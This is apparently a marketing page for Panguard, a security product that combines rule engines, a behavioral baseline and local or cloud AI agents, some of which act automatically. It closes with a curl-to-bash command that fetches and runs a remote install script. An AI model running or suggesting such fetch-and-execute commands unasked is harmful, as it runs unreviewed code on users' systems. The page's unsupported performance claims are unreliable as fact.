HOW IT WORKS

How Panguard Protects You

Five layers of defense. Three tiers of AI. One command to deploy.

AT A GLANCE

Security that thinks in layers

Each layer catches what the previous one misses. Together, they form a defense system that adapts to your environment.

<50ms

Average detection time

90%

Threats caught by rules alone

7 days

To learn your normal

FIVE DETECTION LAYERS

Five layers that catch what others miss

From static analysis to contextual memory, each layer adds intelligence.

Layer 1

Environment Discovery

Automatically maps your infrastructure: OS, services, open ports, installed packages, running processes.

This is how Panguard learns what "normal" looks like for your specific environment.

Layer 2

Rules Engine

3,155 Sigma rules + 926 YARA rules + Suricata network IDS + Falco eBPF monitoring.

Catches 90% of known threats in under 50ms. No AI needed.

Layer 3

Behavioral Baseline

7-day learning period. Panguard observes your system without acting, builds a model of normal behavior.

Switches to protection mode on day 8. No false positives from day one.

Layer 4

AI Analysis

When rules can't explain a behavior, AI steps in. Local first (Ollama on your GPU, fully offline). Cloud only when needed.

Three-tier funnel: 90% rules / 7% local AI / 3% cloud AI. Cost: ~$0.008 per cloud analysis.

Layer 5

Automated Response

6 response actions: block IP, kill process, quarantine file, alert, snapshot evidence, escalate.

Confidence > 90%: automatic. 70-90%: asks you first. < 70%: notifies only.

AI FUNNEL

Three tiers. Minimum cost. Maximum accuracy.

90% of threats don't need AI. We use rules first, AI second, cloud last.

Rules Engine

90%
  • 3,155 Sigma detection rules
  • 926 YARA malware signatures
  • Suricata network IDS rules
  • Falco eBPF system call monitoring
  • Behavioral baseline deviations

<50ms per event

Local AI

7%
  • Ollama running on your machine
  • Runs on NVIDIA GPU for acceleration
  • Fully offline -- data never leaves
  • Handles ambiguous events rules can't classify

~2s per analysis

Cloud AI

3%
  • Claude / OpenAI (configurable)
  • Only invoked when local AI is uncertain
  • Cost: ~$0.008 per analysis
  • Multi-step reasoning chains (up to 8 steps)

~5s per analysis

AGENT PIPELINE

Four AI Agents. One Investigation Engine.

Each agent has a specialized role. Together, they form an autonomous security team.

DetectAgent

Monitors 5 sources: network, processes, filesystem, system logs, normalized events.

AnalyzeAgent

Correlates alerts, determines severity, maps to MITRE ATT&CK framework.

RespondAgent

Executes response based on confidence threshold. Auto, ask, or notify.

ReportAgent

Generates human-readable incident report, sends via Telegram/Slack/Email.

InvestigationEngine

Deep-dives complex incidents with up to 8-step reasoning chains.

AUTOMATED RESPONSE

Six actions. Three confidence levels.

Panguard doesn't just detect. It acts.

Block IP

Cross-platform firewall rule with auto-unblock timer

Kill Process

SIGTERM then SIGKILL with process tree cleanup

Quarantine File

Isolate with SHA-256 hash and restore capability

Alert

Send to your channels in plain language

Snapshot Evidence

Forensic capture of the event context

Escalate

Notify team lead or external SOC

> 90%Automatic execution
70 - 90%Asks you first via Chat
< 70%Notifies only

7-DAY LEARNING

It watches before it acts.

No false positives from day one. Panguard learns your environment before making decisions.

1

Day 1-3

Observation

Process baseline, network patterns, file change patterns, user behavior.

2

Day 4-7

Statistical Modeling

Builds mean + standard deviation model. Identifies what's truly anomalous.

3

Day 8+

Protection Mode

Auto-transition to active protection. Continuous learning -- baseline evolves with your environment.

GRACEFUL DEGRADATION

Your protection never drops to zero.

Cloud down? Local AI takes over. Local AI down? Rules engine always runs.

Optimal

All layers active. Cloud AI + Local AI + Rules Engine.

Cloud Unavailable

Local AI handles complex analysis. Rules engine catches known threats.

LLM Offline

Rules engine + behavioral baseline. Still catches 90% of threats.

Emergency

Rules engine only. Core protection always running.

Ready to see it in action?

One command. Free to start. No account needed.

$ curl -fsSL https://get.panguard.ai | bash
Get Started Read the Technical Deep Dive